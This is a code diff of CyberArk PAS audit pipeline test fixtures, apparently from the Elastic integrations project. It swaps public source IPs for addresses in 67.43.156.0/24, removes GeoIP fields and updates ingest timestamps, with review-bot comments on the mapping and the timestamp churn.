@@ -636,8 +612,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675194300Z", - "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"37.223.7.45\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:37:10.421007900Z", + "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", "action": "authentication_success", 
@@ -661,20 +637,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -694,7 +658,7 @@ "PSMP_ADB_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -702,7 +666,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:48Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "PSMP_ADB_localhost.localdomain", 
@@ -715,8 +679,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675195600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:10.421012900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", "action": "authentication_success", 
@@ -740,20 +704,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -773,7 +725,7 @@ "PSMPApp_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -781,7 +733,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:48Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "PSMPApp_localhost.localdomain", 
@@ -794,8 +746,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675197Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:10.421017400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", "action": "authentication_success", 
@@ -819,20 +771,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -852,7 +792,7 @@ "PSMPGW_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -860,7 +800,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:49Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "PSMPGW_localhost.localdomain", 
@@ -873,8 +813,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675198400Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:49\",\"IsoTimestamp\":\"2021-03-10T09:11:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:10.421021100Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:49\",\"IsoTimestamp\":\"2021-03-10T09:11:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", "action": "authentication_success", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log index 55eeab9c1a7..1fba00495ba 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log 
@@ -4,12 +4,12 @@
 <5>1 2021-03-10T08:28:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:29","IsoTimestamp":"2021-03-10T08:28:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
 <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAGWUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
 <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}}
-<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}}
-<5>1 2021-03-11T17:49:06Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"34.71.250.247"}}}
+<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.13"}}}
+<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n 
Logoff\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.13"}}}
+<5>1 2021-03-11T17:49:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Logoff\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.15"}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json
index 38115574bd3..edc4636d847 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json
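Review bot: The substitution in the `-4,12 +4,12` hunk maps each former public station to its own address in 67.43.156.0/24 (81.32.170.205 to .13, 35.192.121.42 to .14, 34.71.250.247 to .15), so records that carried different stations before still do, and the loopback and RFC 1918 stations (127.0.0.1, 10.0.1.20, 10.0.2.2) are untouched; that is the right shape for a fixture rewrite. The mapping is only recoverable by reading the removed lines, so it is worth stating in the PR description so that the companion expected file and any later fixtures reuse the same assignments. Note also that in the 17:38:13 and 17:48:28 records the new address sits in `GatewayStation` while `Station` stays loopback or private, so the expected output for those records must place it under `destination.ip`, not `source.ip`.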
@@ -49,7 +49,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904208100Z",
+ "ingested": "2021-12-09T13:37:11.641097400Z",
 "original": "\u003c5\u003e1 2021-03-08T18:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:19:15\",\"IsoTimestamp\":\"2021-03-08T18:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
@@ -116,7 +116,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904217Z",
+ "ingested": "2021-12-09T13:37:11.641105700Z",
 "original": "\u003c5\u003e1 2021-03-08T18:59:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:59:23\",\"IsoTimestamp\":\"2021-03-08T18:59:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}",
 "code": "8",
 "kind": "event",
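Review bot: The `-49,7` and `-116,7` hunks change nothing but `event.ingested`, and most of the remaining hunks in this file carry the same rewrite alongside their real change; the field records when the test harness ran, so every regeneration of this expected file will churn it again and bury the substantive edits. If the pipeline test configuration for this data stream supports marking fields as dynamic, `event.ingested` is the obvious candidate; otherwise a regeneration that leaves the old `ingested` values in place keeps the diff limited to the address change.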
@@ -183,7 +183,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:36.904218600Z",
+ "ingested": "2021-12-09T13:37:11.641111200Z",
